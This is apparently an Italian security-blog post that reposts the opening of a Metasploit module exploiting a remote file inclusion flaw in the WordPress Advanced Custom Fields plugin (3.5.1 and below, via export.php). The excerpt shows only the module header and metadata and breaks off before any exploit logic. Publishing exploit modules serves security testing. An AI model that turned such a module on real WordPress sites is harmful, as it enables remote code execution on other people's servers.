WordPress Advanced Custom Fields Remote File Inclusion

3 gennaio 2013 - Fonte: http://www.mondounix.com Lascia il tuo commento »
E' la tua prima volta qui? Allora iscriviti GRATIS ai nostri feeds! 
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer::PHPInclude
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Plugin Advanced Custom Fields Remote File Inclusion',
      'Description'    => %q{
          This module exploits a remote file inclusion flaw in the WordPress blogging
        software plugin known as Advanced Custom Fields. The vulnerability allows for remote
        file inclusion and remote code execution via the export.php script. The Advanced
        Custom Fields plug-in versions 3.5.1 and below are vulnerable. This exploit only
        works when the php option allow_url_include is set to On (Default Off).
      },
      'Author'         =>
        [
          'Charlie Eriksen <charlie@ceriksen.com>',
        ],
      'License'        => MSF_LICENSE,
...

Leggi il seguito »






SEGNALA / INVIA QUESTO POST:  Share
Hai trovato questo articolo interessante? Iscriviti GRATIS ai nostri feeds! 

Lascia un Commento